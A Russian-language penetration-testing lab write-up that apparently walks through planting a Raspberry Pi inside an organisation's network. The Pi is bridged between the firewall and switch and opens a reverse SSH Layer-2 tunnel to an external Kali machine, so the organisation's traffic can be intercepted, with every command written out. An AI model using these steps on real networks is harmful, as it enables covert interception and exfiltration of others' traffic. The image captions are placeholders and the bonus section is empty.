# Pentest_4. Reverse SSH connections
---
Практика 4: Создание тоннеля уровня L2 между промежуточной Debian (RaspberryPi) машиной, подключенной изнутри организации и внешней Kali-машиной с целью перехвата трафика организации
---
## 1. Общая информация
Топология, на которой будет выполняться задание, представлена на рисунке. На внешнем периметре стоит kali Linux, к которой будет подключаться RaspberryPi. Тот в свою очередь подключен внутри инфраструктуры между фаерволом и коммутатором.

>топология
В первую очередь необходимо объеденить интерфейсы e0 и e1 Rpi в мост. Для этого на нем необходимо установить модуль Bridge-utils при помощи ```apt install bridge-utils```. Далее в файл настроек добавляем новый интерфейс ```br0```, который и будет являться мостом.

>конфиг сети на RPI
Убедимся, что мост работает. Для этого на машине внутри инфраструктуры (например Windows7) попробуем пингануть 8.8.8.8, при этом запустив ```tcpdump -i br0``` на RPI. Видим, что Windows получает ответ, а RaspberryPi получает информацию о проходящем трафике.

>пингуем 8.8.8.8 c Windows

> RPI видит весь входящий и исходящий трафик
Теперь осталось подключиться с RaspberryPi к Kali по ssh со специальным флагом для поднятия порта tap: ```ssh root@192.168.140.81 -o Tunnel=ethernet -w any:any```. До этой операции необходимо разрешить туннельное подключение в конфиге ssh на Kali и Debian (```sudo nano /etc/ssh/sshd_config```).


>конфиг ssh

>подключение к Kali на RPI с помощью ssh
Интерфейс tap1 был создан, но его нужно включить при помощи ```ip link set dev tap1 up``` на Kali и RPI. Также необходимо добавить tap1 в bridge соединение с помощью ```brctl addif br0 tap1``` на RPI (+```dhclient tap0``` на Kali). После этого, интерфейс получит IP адрес на Kali, и теперь можно просматривать трафик организации - ```tcpdump -i tap0```.

>tap1 получил IP

>Смотрим трафик
## 2. БОНУС - reverse ssh с windows 10







